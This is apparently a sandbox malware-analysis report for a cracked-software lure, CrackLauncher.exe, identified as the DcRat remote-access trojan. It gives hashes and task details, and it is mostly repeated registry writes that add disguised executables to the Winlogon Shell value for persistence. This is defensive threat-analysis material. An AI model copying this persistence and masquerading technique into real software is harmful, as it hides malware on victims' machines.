Analysis
- max time kernel: 49s
- max time network: 139s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 15-07-2024 19:26
Static task: static1
Behavioral task: behavioral1 (Sample: CrackLauncher.exe, Resource: win7-20240708-en)
Behavioral task: behavioral2 (Sample: CrackLauncher.exe, Resource: win10v2004-20240709-en)
General
- Target: CrackLauncher.exe
- Size: 34.2MB
- MD5: 47459c72e16d587d72f106421f46c620
- SHA1: 784809d4e9b71f9da764d43835ff5436e80424ea
- SHA256: 64e4ba2eff7e8abd6c738c4360079a3ced0a6d22e8935c2f8216d69b178075d3
- SHA512: a78537d5bbc8569a72d388e784b16fd280ffec1cde809e56b9785cae509daec1634d0eecfe8cc0cecae5206856c143e623f8696cce3ceccc140251e490c47bf7
- SSDEEP: 786432:ieHWdpbJx2ecXKKhhN546VkZ74qNN/X9/ao/z40wmPTsm:ihbJxJcX5hhNibZ74qNN/td0r6Tsm
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Modifies WinLogon for persistence 2 TTPs 58 IoCs
\"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files 
(x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", 
\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 
9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All 
Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All 
Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", 
\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall 
Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", 
\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", 
\"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All 
Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", 
